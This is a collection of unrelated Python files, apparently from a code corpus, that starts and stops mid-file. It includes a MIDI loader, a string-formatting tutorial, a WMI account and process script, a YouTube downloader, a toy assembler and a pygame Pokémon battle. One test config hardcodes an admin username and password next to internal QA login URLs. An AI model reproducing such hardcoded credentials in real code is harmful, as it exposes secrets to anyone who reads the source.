item.msgs.msgs.remove(msg)
def fixForRepeatNote(self, item):
for msg in item.msgs.msgs:
if msg.velocity > 0 and item.msgs.hasMsgDown(channel=msg.channel, note=msg.note, beside=msg):
item.msgs.msgs.remove(msg)
def sortByTick(self):
self.msgList.sort(key=lambda item: item.tick)
def load(self, file, tickrate=20.0, restrict=0):
mid = mido.MidiFile(file)
currentTime = 0.0
currentTick = 0
lastChannel, lastNote = -1, -1
for msg in mid:
if msg.is_meta:
if msg.time > 0:
currentTime += msg.time
elif msg.type == 'note_on' or msg.type == 'note_off':
if msg.time == 0 and lastChannel == msg.channel and lastNote == msg.note and msg.velocity == 0:
continue
lastChannel, lastNote = msg.channel, msg.note
currentTime += msg.time
m = {
'track' : 0, #msg.track,
'channel' : msg.channel,
'note' : msg.bytes()[1],
'velocity': 0 if msg.type == 'note_off' else msg.bytes()[2],
# 'time' : msg.time,
# 'tick' : int(round(time / tickDelta)),
}
newMsg = Msg(m['track'],m['channel'],m['note'],m['velocity'])
toTick = int(round(currentTime / (1/tickrate)))
item = self.findByTick(toTick)
item.msgs.append(newMsg)
if newMsg.velocity > 0:
self.fixForOverLapNote(item)
self.fixForRepeatNote(item)
else:
self.fixForShortNote(item)
self.sortByTick()
if __name__ == '__main__':
msgList = MsgList()
msgList.load(f'./mid/阴天快乐debug.mid', 68.0 / 5)
for item in msgList.msgList:
print(f'tick: {item.tick}')
for msg in item.msgs.msgs:
if msg.velocity > 0:
print(f' msg: {msg.track} {msg.channel} {msg.note} {msg.velocity}')
|
'''
Source : https://pyformat.info/
'''
# single symbol multiline comment control
'''
# just alignment
print('{0:>7}'.format('zip','hello'))
print('{1:<7}'.format('zip','hello'))
print('{1:^7}'.format('zip','hello'))
# text is left align by default
print('{0:10}'.format("hello"))
# numbers are right align
print('{0:10f}'.format(3.141592653589793))
# with padding
print('{0:*>7}'.format('zip'))
print('{0:*<7}'.format('zip'))
print('{0:*^7}'.format('zip'))
#'''
'''
# Truncating
print('{0:.5}'.format('xylophone'))
# decimal places
print('{0:.5f}'.format(4.2))
print('{0:.5f}'.format(4.2453142352))
# Truncating and padding
# {<positional-argument>:<padding><alignment><width>.<truncating> }
print('{0:*^12.5}'.format('xylophone'))
# whole string limit
print('{0:*^12.5}'.format(1234.567))
# decimal places
print('{0:*^12.5f}'.format(1234.567))
#'''
'''
# Numbers
# text is left align by default
print('{0:10}'.format("hello"))
# numbers are right align
print('{0:10f}'.format(3.141592653589793))
# Just 'f' is left align, as no limit found
print('{0:f}'.format(3.141592653589793))
print('{0:.10f}'.format(3.141592653589793))
# padding numbers
# auto padded with space
print('{:4d}'.format(42))
# padding with zero
print('{:04d}'.format(42))
print('{:010d}'.format(42))
# padding with numbers and float
print('{:06.2f}'.format(3.141592653589793))
#'''
'''
Just perfect-
For integer values providing a precision doesn't make much sense
and is actually forbidden in the new style (it will result in a ValueError).
'''
'''
# signed numbers
print('{:+d}'.format((- 23)))
print('{:+d}'.format((23)))
# New style formatting is also able to control the position of the sign
# symbol relative to the padding.
# digit will come in width 5
print('{:=+5d}'.format(-23))
print('{:=+5d}'.format(23))
#'''
'''
# name placeholders
print('{first} {last}'.format(first='Hodor', last='Hodor!'))
# with data
data = {'first': 'Hodor', 'last': 'Hodor!'}
print('{first} {last}'.format(**data))
# Getitem and Getattr
person = {'first': 'Jean-Luc', 'last': 'Picard'}
print('{p[first]} {p[last]}'.format(p=person))
data = [4, 8, 15, 16, 23, 42]
print('{d[4]} {d[5]}'.format(d=data))
# even with class- super cool
class Plant(object):
type = 'tree'
kinds = [{'name': 'oak'}, {'name': 'maple'}]
print('{p.type}'.format(p=Plant()))
print('{p.type}: {p.kinds[0][name]}'.format(p=Plant()))
#'''
'''
# THE NEXT BIG THING
# Parametrized formats
# Parametrized alignment and width:
print('{:{align}{width}}'.format('test', align='^', width='10'))
#Parametrized precision:
print('{:.{prec}} = {:.{prec}f}'.format('Gibberish', 2.7182, prec=3))
print('{1:.{prec}} = {1:.{prec}f}'.format('Gibberish', 2.7182, prec=3))
# width and precision
print('{:{width}.{prec}f}'.format(2.7182, width=5, prec=2))
# notice the minor change
print('{:{prec}} = {:{prec}}'.format('Gibberish', 2.7182, prec='.3'))
# with numbers - positional arguments
print('{:{}{}{}.{}}'.format(2.7182818284, '>', '+', 10, 3))
# mixed with keyword arguments
print('{:{}{sign}{}.{}}'.format(2.7182818284, '>', 10, 3, sign='+'))
#'''
'''
from datetime import datetime
print('{:%Y-%m-%d %H:%M}'.format(datetime(2001, 2, 3, 4, 5)))
# parameterized date and time
dt = datetime(2001, 2, 3, 4, 5)
print('{:{dfmt} {tfmt}}'.format(dt, dfmt='%Y-%m-%d', tfmt='%H:%M'))
#'''
#'''
# The date time works because of __format__() method
# For custom objects - INSANELY AWESOME
class MYCLASS(object):
def __format__(self, format):
if (format == 'open-the-pod-bay-doors'):
return "I'm afraid I can't do that."
else:
return 'Invalid format'
print('{:open-the-pod-bay-doors}'.format(MYCLASS()))
print('{:some-invalid-format}'.format(MYCLASS()))
|
__author__ = 'sandeeps'
#application_url = "https://commcareqa.tangoe.com/manage/login/login.trq"
#application_url = "https://qa5.traq.com/manage/login/login.trq"
application_url = "https://qa1cmd.tangoe.com/manage/login/login.trq"
input_path = 'C:\Users\sandeeps\PycharmProjects\CodeFestS\com\Testdata.csv'
output_path = "C:\Users\sandeeps\PycharmProjects\CodeFestS\com\codefest\scripts\problems\problem1\TestResult"
usernameadmin = '3siadmin'
passwordadmin = 'ppppp11'
report_category = "Department Summary Reports"
report_category_csv = "C:\Users\sandeeps\PycharmProjects\Tangoe\com\Reports\GenerateReports\Testdata\DepartmentSummaryReports.csv"
ParameterFormat1_csv = "C:\Users\sandeeps\PycharmProjects\Tangoe\com\Reports\GenerateReports\Testdata\ParameterFormat1.csv"
|
import wmi
def show_wmi_classes(w):
# See list of classes
for class_name in w.classes:
if 'User' in class_name or 'Account' in class_name:
print("Class: " + str(class_name))
def show_wmi_methods(item):
print(item)
for k in item.methods.keys():
print("Method: " + str(k))
def show_wmi_properties(item):
for p in item.properties.keys():
print("Prop: " + p + " -> " + str(getattr(item, p)))
def show_wmi_processes(w, process_name):
for p in w.Win32_Process(name=process_name):
print("LMS Process: " + str(p.Caption))
def kill_wmi_process(w, process_name):
for p in w.Win32_Process(name=process_name):
print("Killing Process: " + str(p.Name))
p.Terminate()
def show_wmi_net_interfaces(w):
for i in w.Win32_NetworkAdapterConfiguration(IPEnabled=1):
print("Int: " + str(i.Description) + " " + str(i.MACAddress))
for ip in i.IPAddress:
print("IP Addr: " + str(ip))
def show_wmi_removable_drives(w):
DRIVE_TYPES = {
0: "Unknown",
1: "No Root Directory",
2: "Removable Disk",
3: "Local Disk",
4: "Network Drive",
5: "Compact Disk",
6: "RAM Disk"
}
for drive in w.Win32_LogicalDisk():
# if drive.DriveType != 3:
# NOTE - Picking up some USB drives as local?
print("Found Drive: " + drive.Caption + " (" + DRIVE_TYPES[drive.DriveType] + ")")
print(drive)
w = wmi.WMI()
# show_wmi_classes(w)
# Win32_LoggedOnUser
# Win32_AccountSID
# Win32_Account
# Win32_UserProfile
# Win32_UserDesktop
# Win32_UserAccount
item = w.Win32_Account
show_wmi_methods(item)
show_wmi_properties(item)
#show_wmi_processes(w, "OPE_LMS.exe")
#kill_wmi_process(w, "OPE_LMS.exe")
#show_wmi_net_interfaces(w)
#show_wmi_removable_drives(w)
|
#!/usr/bin/env python3
import argparse
import os
import json
import threading
from queue import Queue
from subprocess import check_output
from youtube import Channel
from youtube.offliberty import Offurl, Offget
def getVid(url, path, vid = False, name = '', thumb = False, quiet = False):
o = Offget(url, vid = vid)
if name:
o.name = name
o.getUrl(quiet = quiet)
o.dl(path = path, quiet = quiet)
if thumb:
o.ytVid.setInfo()
o.ytVid.thumb.dl(path = path, quiet = quiet)
def getVidThreader(q, **kwargs):
worker = q.get()
getVid(**kwargs)
q.task_done()
def getVidAsync(q, **kwargs):
thread = threading.Thread(target =getVidThreader, args = [q], kwargs = kwargs)
thread.start()
q.put(q.qsize())
def getClipboard():
#requires 'xsel' command
return check_output(['xsel']).decode('utf-8')
def autoDownload(**kwargs):
q = Queue()
threads = []
kwargs['url'] = ''
printed = False
while True:
text = getClipboard()
if text != kwargs['url']:
kwargs['url'] = text
if [link for link in ['youtube.com','youtu.be'] if link in text]:
getVidAsync(q, **kwargs)
else:
if not printed:
print(text, 'is not a valid url')
printed = True
if __name__ == '__main__':
parser=argparse.ArgumentParser()
parser.add_argument('url', metavar = 'url', nargs='?', help = 'Video url')
parser.add_argument('-v', action = 'store_true', help = 'Download the video instead of audio')
parser.add_argument('-t', action = 'store_true', help = 'Download thumbnail')
parser.add_argument('-u', action = 'store_true', help = 'Get the offliberty url only')
parser.add_argument('-o', default = '', help = 'Specify output file')
parser.add_argument('--auto', action = 'store_true', help = 'Auto download any urls in clipboard')
parser.add_argument('-C', action = 'store_true', help = 'Download all videos from channel')
parser.add_argument('-s', action = 'store_true', help = 'Quiet mode. Will still output url if requested')
args=parser.parse_args()
path=os.getcwd()
if args.auto:
autoDownload(path = path, vid = args.v, name =args.o, thumb = args.t, quiet = args.s)
else:
if args.u:
o = Offurl(args.url, vid = args.v)
o.req(quiet = args.s)
print(o.text)
if args.t:
o.ytVid.thumb.testUrl()
print(o.ytVid.thumb.url)
elif args.C:
channel = Channel(args.url)
channel.req()
for vid in channel.iter_vids():
getVid(vid.url, path = path, vid = args.v, name = args.o, thumb = args.t, quiet = args.s)
else:
getVid(url = args.url, path = path, vid = args.v, name = args.o, thumb = args.t, quiet = args.s) |
import sys
def is_def(s): return s[0] == '@'
def is_ref(s): return s[0] == '!'
def is_bin(s):
if len(s) < 2: return False
else: return s[1] == 'b'
def is_byte(x):
try:
if is_bin(x):
int(x, 2)
else:
int(x)
return True
except:
return False
def to_int(x):
if is_bin(x):
return int(x, 2)
else:
return int(x)
def get_op(s, symbols):
if is_def(s): return 4
if is_ref(s): return symbols[s[1:]]
if is_byte(s): return to_int(s)
return {
"HALT": 0,
"LOADI": 1,
"ADD": 2,
"PRINT": 3,
"NOP": 4,
"JUMP": 5,
"LOADR": 6,
"JEQ": 7,
"COMP": 8,
"JNEQ": 9,
"COLOR": 10,
"INC": 11,
"DEC": 12,
"CALL": 13,
"RET": 14,
"INPUT": 15,
"AND": 16,
"XOR": 17,
"OR": 18,
"SUB": 19,
"DIV": 20,
"MUL": 21,
"JZ": 22,
"JNZ": 23,
"PRINTB": 24,
"ANDI": 25,
"COLORI": 26,
"DRAW": 27,
"PUSH": 28,
"POP": 29,
"JUMPDT": 30,
}[s]
def compile(infile):
f = open(infile).read()
symbols = dict()
program = bytearray()
# find all the defs
for addr, op in enumerate(f.split()):
print(addr, op)
if is_def(op):
symbols[op[1:]] = addr
for op in f.split():
program.append(get_op(op, symbols))
print("main: ", symbols["main"])
print(symbols)
return program
if __name__ == "__main__":
infile = sys.argv[1]
outfile = sys.argv[2]
p = compile(infile)
with open(outfile, "wb") as f:
f.write(p)
|
from flask_restplus import fields
from api import api
add_address = api.model("add_address", {
"name" : fields.String(),
"address" : fields.String(),
"city" : fields.String(),
"state" : fields.String(),
"country" : fields.String(),
"pincode" : fields.String(),
"phone_numbers" : fields.List(fields.String()),
"email_address" : fields.String(),
})
updated_address = api.model("update_address", {
"name" : fields.String(),
"address" : fields.String(),
"city" : fields.String(),
"state" : fields.String(),
"country" : fields.String(),
"pincode" : fields.String(),
"phone_numbers" : fields.List(fields.String()),
"email_address" : fields.String(),
})
|
'''
Created on Apr 30, 2009
@author: pmackenz
'''
class MyClass(object):
def __init__(self,v, s):
print("entering __init__({})".format(v))
self.val = v
self.my_name = str(s)
def __len__(self):
print("entering __len__()")
return len(self.val)
def __add__(self, y):
print("entering __add__({})".format(y.val))
name = "%s+%s" % (self.my_name, y.name())
return MyClass( self.val + y.val, name )
def __sub__(self, y):
print("entering __sub__({})".format(y.val))
name = "%s-%s" % (self.my_name, y.name())
return MyClass( self.val - y.val, name )
def name(self):
print("entering __name__()")
return self.my_name
def setname(self, s):
print("entering __setname__({})".format(s))
self.my_name = s
def __str__(self):
print("entering __str__()")
return str( self.val )
def main():
x = MyClass( 4, 'peter')
print("variable x = {} (type: {}, name: {})".format(x, type(x), x.name()))
y = MyClass( 7, 'joe' )
print("variable y = {} (type: {}, name: {})".format(y, type(y), y.name()))
z = x + y
print("variable z = {} (type: {}, name: {})".format(z, type(z), z.name()))
z = y + x
print("variable z = {} (type: {}, name: {})".format(z, type(z), z.name()))
z.setname('paul')
print("variable z = {} (type: {}, name: {})".format(z, type(z), z.name()))
a = x - y
print("variable a = {} (type: {}, name: {})".format(a, type(a), a.name()))
b = z + x
print("variable b = {} (type: {}, name: {})".format(b, type(b), b.name()))
# main execution
main()
|
"""
"""
import sys, os, pygame, time, random
import battle, get_pokemon_info
from PIL import Image
def load_resources(screen = None, my_pk = None, opp_pk = None):
"""my_pk and opp_pk must be the national dex numbers
of the pokemon"""
# State machine functions
res["show moves logic"] = show_moves_logic
res["show moves display"] = show_moves_display
res["first attack logic"] = attack_logic
res["first attack display"] = attack_display
res["second attack logic"] = attack_logic
res["second attack display"] = attack_display
res["game over logic"] = game_over_logic
res["game over display"] = game_over_display
res["font"] = pygame.font.Font("Resources\\Pokemon Fonts\\pkmnrs.ttf", 30)
res["black"] = (0, 0, 0)
res["red"] = (255, 0, 0)
res["green"] = (0, 255, 0)
res["yellow"] = (255, 255, 0)
res["blue"] = (0, 0, 255)
res["text colour"] = res["black"]
res["anti alias"] = True
res["size"] = 720, 480
os.environ["SDL_VIDEO_CENTERED"] = "1" # Centres game window
if screen:
res["screen"] = screen
else:
res["screen"] = pygame.display.set_mode(res["size"])
number_of_pokemon = 2
pokemon_numbers = get_random_pokemon(number_of_pokemon)
if my_pk:
my_pk = get_pokemon_info.pokemon_number(my_pk)
pokemon_numbers[0] = my_pk
if opp_pk:
opp_pk = get_pokemon_info.pokemon_number(opp_pk)
pokemon_numbers[1] = opp_pk
pokemon_names = get_pokemon_names(pokemon_numbers)
pokemon_1 = pokemon_numbers[0]
pokemon_2 = pokemon_numbers[1]
res["my moves"] = get_moves(pokemon_names[0])
res["opp moves"] = get_moves(pokemon_names[1])
res["all moves"] = get_pokemon_info.get_dict("all_moves.txt")
res["physical moves"] = get_pokemon_info.get_dict("physical_moves.txt")
res["special moves"] = get_pokemon_info.get_dict("special_moves.txt")
res["other moves"] = get_pokemon_info.get_dict("other_moves.txt")
res["pokemon"] = create_pokemon(pokemon_numbers, [res["my moves"], res["opp moves"]])
p0 = res["pokemon"][0]
p1 = res["pokemon"][1]
# Original size: 96 x 96, scaled size = 288, 288
f2 = pygame.image.load("Resources\\bw-001n\\" + pokemon_2 + ".png")
pokemon_position = get_opponent_position(pokemon_2)
res["positions"] = [(60, 150), pokemon_position]
f2 = pygame.transform.scale(f2, (192, 192))
f1 = pygame.image.load("Resources\\bwback-001n\\" + pokemon_1 + ".png")
f1 = pygame.transform.scale(f1, (288, 288))
res["opp pokemon sprite"] = f2
res["my pokemon sprite"] = f1
res["bg"] = pygame.image.load("Resources\\battle_screen_with_moves_blank.png")
res["type icons"] = load_pokemon_type_icons()
res["moves bar"] = pygame.image.load("Resources\\moves_bar.png")
res["move selection"] = pygame.image.load("Resources\\move_selection.png")
res["text bar"] = pygame.image.load("Resources\\text_bar.png")
res["my hp bar"] = pygame.image.load("Resources\\hp_bar_01.png")
res["opp hp bar"] = pygame.image.load("Resources\\hp_bar_02.png")
res["my green hp"] = pygame.image.load("Resources\\hp_bars\\green.png")
res["opp green hp"] = pygame.image.load("Resources\\hp_bars\\green.png")
res["my yellow hp"] = pygame.image.load("Resources\\hp_bars\\yellow.png")
res["opp yellow hp"] = pygame.image.load("Resources\\hp_bars\\yellow.png")
res["my red hp"] = pygame.image.load("Resources\\hp_bars\\red.png")
res["opp red hp"] = pygame.image.load("Resources\\hp_bars\\red.png")
res["my empty hp"] = pygame.image.load("Resources\\hp_bars\\empty.png")
res["opp empty hp"] = pygame.image.load("Resources\\hp_bars\\empty.png")
res["hp bars pos"] = [(380, 225), (30, 43)]
res["hp colour pos"] = [(res["hp bars pos"][1][0] + 95, res["hp bars pos"][1][0] + 61)]
res["hp colour pos"] += [(res["hp bars pos"][1][0] + 459, res["hp bars pos"][1][0] + 242)]
res["hp max colour width"] = 144
res["hp widths"] = [144, 144]
res["hp percent"] = [p0.stats["HP"] / p0.original_stats["HP"]]
res["hp percent"] += [p1.stats["HP"] / p1.original_stats["HP"]]
res["my hp bar status"] = {"colour" : "green", "width" : 144 * res["hp percent"][0]}
res["opp hp bar status"] = {"colour" : "green", "width" : 144 * res["hp percent"][1]}
res["hp bars"] = [{
"green" : res["my green hp"], "yellow" : res["my yellow hp"],
"red" : res["my red hp"], "empty" : res["my empty hp"]
}]
res["hp bars"] += [{
"green" : res["opp green hp"], "yellow" : res["opp yellow hp"],
"red" : res["opp red hp"], "empty" : res["opp empty hp"]
}]
res["prev hp"] = [p1.original_stats["HP"], p0.original_stats["HP"]]
res["move surfaces"] = []
for move in res["my moves"]:
res["move surfaces"] += [get_move_surface(move, res["anti alias"], res["text colour"])]
res["quadrants"] = initialise_display()
res["move selection pos"] = []
for quadrant in res["quadrants"]:
res["move selection pos"] += [(quadrant[0] + 3, quadrant[1] + 3)]
#res["battle music"] =
load_sound("FRLG_Battle_01.mp3")
def get_random_pokemon(number_of_pokemon):
# Returns a list of n random pokemon from
# 001 - 649 (Bulbasaur to Genesect)
pokemon_numbers = []
for i in range(number_of_pokemon):
num = random.randrange(1, 650)
num = get_pokemon_info.pokemon_number(num)
pokemon_numbers += [num]
return pokemon_numbers
def get_pokemon_names(pokemon_numbers):
numbered_pokemon = get_pokemon_info.get_dict("numbered_pokemon.txt")
names = []
for num in pokemon_numbers:
names += [numbered_pokemon[num]]
return names
def get_moves(pokemon_name):
moves = get_pokemon_info.get_random_moves(pokemon_name)
return moves
def create_pokemon(pokemon_numbers, moves):
pokemon = []
numbered_pokemon = get_pokemon_info.get_dict("numbered_pokemon.txt")
i = 0
all_stats = get_pokemon_info.get_dict("pokemon_stats.txt")
for num in pokemon_numbers:
name = numbered_pokemon[get_pokemon_info.pokemon_number(num)]
pokemon += [battle.Pokemon(name, moves[i], all_stats[name])]
i += 1
return pokemon
def split_list(cols, linear_list):
temp_list = []
split_list = []
for i in range(len(linear_list)):
temp_list += [linear_list[i]]
if (i + 1) % cols == 0:
split_list += [temp_list]
temp_list = []
return split_list
def get_opponent_position(opponent_number):
# Find the bottom-most pixel in the middle column, and align
# that with the center of the opponent stage
image = Image.open("Resources\\bw-001n\\" + opponent_number + ".png")
image = image.resize((192, 192), Image.ANTIALIAS)
image = image.convert("RGBA")
pixel_data = list(image.getdata())
pixel_data = split_list(192, pixel_data)
middle = 96
stage_middle = (520, 195)
for i in range(96, len(pixel_data)):
if pixel_data[i][middle][3] != 0:
bottom = i
return (stage_middle[0] - middle, stage_middle[1] - bottom)
def load_pokemon_type_icons():
type_icons = {}
move_types = ["bug", "dark", "dragon", "electric", "fighting", "fire",
"flying", "ghost", "grass", "ground", "ice", "normal",
"other", "physical", "poison", "psychic", "rock",
"special", "steel", "water"]
for i in move_types:
icon = pygame.image.load("Resources\\Move Icons\\" + i + ".png")
if i != "physical" and i != "special" and i != "other":
icon = pygame.transform.scale(icon, (64, 32))
else:
icon = pygame.transform.scale(icon, (56, 28))
type_icons[i] = icon
return type_icons
def get_move_surface(move, anti_alias, text_colour):
return res["font"].render(move, True, text_colour)
def initialise_display():
moves_top_left = (18, 356)
moves_center = (240, 410)
quadrant_width = moves_center[0] - 18
quadrant_height = moves_center[1] - 356
quadrant_1 = pygame.Rect(18, 356, quadrant_width, quadrant_height)
quadrant_2 = pygame.Rect(241, 356, quadrant_width, quadrant_height)
quadrant_3 = pygame.Rect(18, 410, quadrant_width, quadrant_height)
quadrant_4 = pygame.Rect(241, 410, quadrant_width, quadrant_height)
return [quadrant_1, quadrant_2, quadrant_3, quadrant_4]
def mouse_in_quadrant(mouse_position, move_quadrants):
for i in range(4):
if move_quadrants[i].collidepoint(mouse_position):
return i
return -1
def update_state_machine():
"""
Game states:
State progression via mouse click (or specifically, mouse up)
show moves -> highlight move -> attack1 if able -> attack2 if able -> game over if able
States to be worked on include healing pokemon/using item, show current party,
switching pokemon out, running from battle
Can call game state functions via the res dict, e.g.:
res["game over"] = game_over
res["game over"]()
Check if HP == 0 for either pokemon and if so, return game over and the winner
"""
current = res["game state"]
if current == "start":
next_state = "show moves"
elif current == "show moves" and res["selected index"] == res["current quadrant"]:
next_state = "first attack"
elif current == "first attack":
if res["fainted"]:
next_state = "game over"
else:
next_state = "second attack"
elif current == "second attack":
if res["fainted"]:
next_state = "game over"
else:
next_state = "show moves"
else:
next_state = current
return next_state
def show_moves_logic():
if res["current quadrant"] != -1:
res["selected index"] = res["current quadrant"]
res["current move"] = res["my moves"][res["selected index"]]
def show_moves_display():
move_surfaces = res["move surfaces"]
quadrants = res["quadrants"]
screen = res["screen"]
moves_bar = res["moves bar"]
move_selection = res["move selection"]
moves = res["my moves"]
selected_index = res["selected index"]
anti_alias = res["anti alias"]
text_colour = res["text colour"]
type_icons = res["type icons"]
screen.blit(moves_bar, (0, 337))
screen.blit(move_surfaces[0],(quadrants[0][0] + 30, quadrants[0][1] + 15))
screen.blit(move_surfaces[1],(quadrants[1][0] + 10, quadrants[1][1] + 15))
screen.blit(move_surfaces[2],(quadrants[2][0] + 30, quadrants[2][1] + 10))
screen.blit(move_surfaces[3],(quadrants[3][0] + 10, quadrants[3][1] + 10))
if res["selected index"] != -2:
screen.blit(move_selection, res["move selection pos"][res["selected index"]])
# Display move information
highlighted_move = moves[selected_index]
move_data = res["all moves"][highlighted_move]
move_type = move_data[0]
move_phys_spec = move_data[1]
move_power = move_data[3]
move_accuracy = move_data[4]
move_text = ["Power: " + str(move_power)]
#move_text += ["Type: " + move_type[0:4].upper() + "/" + move_phys_spec[0:3].upper()]
move_text += ["Type: "]
move_text += ["Accuracy: " + str(move_accuracy) + "%"]
right_box = [res["font"].render(move_text[0] , anti_alias, text_colour)]
right_box += [res["font"].render(move_text[1] , anti_alias, text_colour)]
right_box += [res["font"].render(move_text[2] , anti_alias, text_colour)]
screen.blit(right_box[0],(505, 360))
screen.blit(right_box[1],(505, 395))
screen.blit(right_box[2],(505, 430))
screen.blit(type_icons[move_type],(573, 392))
screen.blit(type_icons[move_phys_spec],(641, 394))
def get_opponent_move():
return res["opp moves"][random.randrange(3)]
def show_attack(attacker, defender, current_move):
a = attacker
d = defender
battle_over = False
temp_HP = defender.stats["HP"]
battle_text_message = []
battle_text = []
battle.attack(attacker, defender, current_move)
if temp_HP != defender.stats["HP"]:
battle_text_message += ["", attacker.name + " used " +\
current_move + "!", ""]
else:
battle_text_message = [""]
battle_text_message += [attacker.name + " used " +\
current_move]
battle_text_message[1] += "... but it had no effect!"
battle_text_message += [""]
#print(attacker.name + " used " + current_move + "!")
#print(defender.name + "'s HP fell from " + \
# str(temp_HP) + \
# " to " + str(defender.stats["HP"]))
#print()
if attacker.stats["HP"] == 0:
battle_text_message += [attacker.name + " fainted... " + defender.name + " wins!"]
battle_over = True
return battle_over, battle_text
if defender.stats["HP"] == 0:
battle_text_message += [defender.name + " fainted... " + attacker.name + " wins!"]
battle_over = True
for i in range(len(battle_text_message)):
battle_text += [res["font"].render(battle_text_message[i] , True , (0, 0, 0))]
return battle_over, battle_text
def attack_logic():
if res["game state"] == "first attack":
attacker = res["pokemon"][0]
defender = res["pokemon"][1]
elif res["game state"] == "second attack":
res["current move"] = get_opponent_move()
attacker = res["pokemon"][1]
defender = res["pokemon"][0]
res["fainted"], res["battle text"] = show_attack(attacker, defender, res["current move"])
def attack_display():
screen = res["screen"]
text_bar = res["text bar"]
battle_text = res["battle text"]
screen.blit(text_bar, (0, 337))
#screen.blit(battle_text[0], (25, 360))
screen.blit(battle_text[1], (25, 398))
#screen.blit(battle_text[2], (25, 435))
def game_over_logic():
res["game over"] = True
def game_over_display():
screen = res["screen"]
text_bar = res["text bar"]
battle_text = res["battle text"]
screen.blit(text_bar, (0, 337))
screen.blit(battle_text[3], (25, 398))
res["exit game"] = True
def update_hp_bars():
# Change hp bars:
#if p0.stats["HP"] * p1.stats["HP"] != 0:
screen = res["screen"]
p0 = res["pokemon"][0]
p1 = res["pokemon"][1]
p0_hp_bar = res["my hp bar status"]
p1_hp_bar = res["opp hp bar status"]
myfont = res["font"]
hp_bars = res["hp bars"]
hp_colour_pos = res["hp colour pos"]
prev_hp = res["prev hp"]
pokemon = res["pokemon"]
anti_alias = res["anti alias"]
text_colour = res["text colour"]
hp_percent = [p0.stats["HP"] / p0.original_stats["HP"]]
hp_percent += [p1.stats["HP"] / p1.original_stats["HP"]]
if hp_percent[1] > 0.5:
p0_hp_bar["colour"] = "green"
elif hp_percent[1] > 0.2 :
p0_hp_bar["colour"] = "yellow"
elif hp_percent[1] <= 0.2:
p0_hp_bar["colour"] = "red"
elif hp_percent[1] == 0:
p0_hp_bar["colour"] = "empty"
if hp_percent[0] > 0.5:
p1_hp_bar["colour"] = "green"
elif hp_percent[0] > 0.2:
p1_hp_bar["colour"] = "yellow"
elif hp_percent[0] <= 0.2:
p1_hp_bar["colour"] = "red"
elif hp_percent[0] == 0:
p1_hp_bar["colour"] = "empty"
#print(hp_percent)
new_widths = [144 * hp_percent[0], 144 * hp_percent[1]]
#print(hp_percent[0], hp_widths[0])
hp_1 = hp_bars[0][p0_hp_bar["colour"]]
hp_2 = hp_bars[1][p1_hp_bar["colour"]]
hp_1 = pygame.transform.scale(hp_1, (round(new_widths[1]), 6))
hp_2 = pygame.transform.scale(hp_2, (round(new_widths[0]), 6))
hp_bars[0][p0_hp_bar["colour"]] = hp_1
hp_bars[1][p1_hp_bar["colour"]] = hp_2
# Green/red/yellow/empty hp:
#screen.blit(red_hp, (hp_bars_pos[0][0] + 95, hp_bars_pos[0][0] + 61))
screen.blit(hp_bars[0][p0_hp_bar["colour"]], hp_colour_pos[0])
screen.blit(hp_bars[1][p1_hp_bar["colour"]], hp_colour_pos[1])
hp_text_message = [str(prev_hp[1]) + "/" + \
str(pokemon[0].original_stats["HP"])]
hp_text_message += [str(prev_hp[0]) + "/" + \
str(pokemon[1].original_stats["HP"])]
res["prev hp"] = [pokemon[1].stats["HP"], pokemon[0].stats["HP"]]
hp_text = [myfont.render(hp_text_message[0] , anti_alias, text_colour)]
hp_text += [myfont.render(hp_text_message[1] , anti_alias, text_colour)]
screen.blit(hp_text[1], (hp_colour_pos[0][0] + 80, hp_colour_pos[0][1] + 15))
screen.blit(hp_text[0], (hp_colour_pos[1][0] + 80, hp_colour_pos[1][1] + 15))
def load_sound(filename):
path = "Resources/Sounds/"
if not pygame.mixer:
return None
else:
return pygame.mixer.music.load(path + filename)
def update_screen():
screen = res["screen"]
f2 = res["opp pokemon sprite"]
f1 = res["my pokemon sprite"]
p0 = res["pokemon"][0]
p1 = res["pokemon"][1]
# Display background, pokemon, hp bars, and moves/battle text:
screen.fill(res["black"])
screen.blit(res["bg"], (0, 0))
screen.blit(f1, res["positions"][0])
screen.blit(f2, res["positions"][1])
screen.blit(res["my hp bar"], res["hp bars pos"][0])
screen.blit(res["opp hp bar"], res["hp bars pos"][1])
# Display pokemon names above their respective HP bars
p1_name_text = res["font"].render(p1.name, True, res["text colour"])
p0_name_text = res["font"].render(p0.name, True, res["text colour"])
name_text_pos = [(420, 236), (55, 54)]
screen.blit(p1_name_text, name_text_pos[1])
screen.blit(p0_name_text, name_text_pos[0])
update_hp_bars()
def advance_frame():
# update whole screen (use display.update(rectangle) to update
# chosen rectangle portions of the screen to update
pygame.display.flip()
def main(screen = None, my_pk = None, opp_pk = None):
# res is a dict of all resource variables
res["keep playing"] = True
while res["keep playing"]:
res["keep playing"] = False
# Initialise
pygame.init()
pygame.font.init()
pygame.mixer.init()
load_resources(screen, my_pk, opp_pk)
p0 = res["pokemon"][0]
p1 = res["pokemon"][1]
#res["game state"] = "start"
res["game state"] = "show moves"
res["game over"] = False
res["my turn"] = True
res["exit game"] = False
res["move selected"] = -1 # [-1, 0, 1] = [not selected, selected, confirmed]
res["selected index"] = -2 # random value that isn't a possible index and not -1
#res["battle music"].play()
pygame.mixer.music.set_volume(0.1)
pygame.mixer.music.play()
while 1:
if res["game over"]:
for event in pygame.event.get():
keys = pygame.key.get_pressed()
if keys[pygame.K_r]:
res["keep playing"] = True
elif keys[pygame.K_ESCAPE] or keys[pygame.K_a]:
#pygame.display.quit()
#sys.exit()
pygame.mixer.music.stop()
return
if res["keep playing"]:
break
for event in pygame.event.get():
keys = pygame.key.get_pressed()
if event.type == pygame.QUIT or keys[pygame.K_ESCAPE]:
pygame.mixer.music.stop()
pygame.display.quit()
sys.exit()
elif event.type == pygame.MOUSEBUTTONUP:
mouse_position = pygame.mouse.get_pos()
res["current quadrant"] = mouse_in_quadrant(mouse_position,
res["quadrants"])
res["game state"] = update_state_machine()
res[res["game state"] + " logic"]()
elif keys[pygame.K_r]:
res["keep playing"] = True
if res["keep playing"]:
break
update_screen()
res[res["game state"] + " display"]()
advance_frame()
#res["battle music"].stop()
pygame.mixer.music.stop()
def play(screen = None, my_pk = None, opp_pk = None):
main(screen, my_pk, opp_pk)
res = {} # Resources dict kept as a global variable for easy access
if __name__ == "__main__":
main()
|
from ..parser.Parser import Parser, ParserUtils
from ..schema.PgView import PgView
class CreateViewParser(object):
@staticmethod
def parse(database, statement):
parser = Parser(statement)
parser.expect("CREATE")
parser.expect_optional("OR", "REPLACE")
parser.expect("VIEW")
viewName = parser.parse_identifier()
columnsExist = parser.expect_optional("(")
columnNames = list()
if (columnsExist):
while not parser.expect_optional(")"):
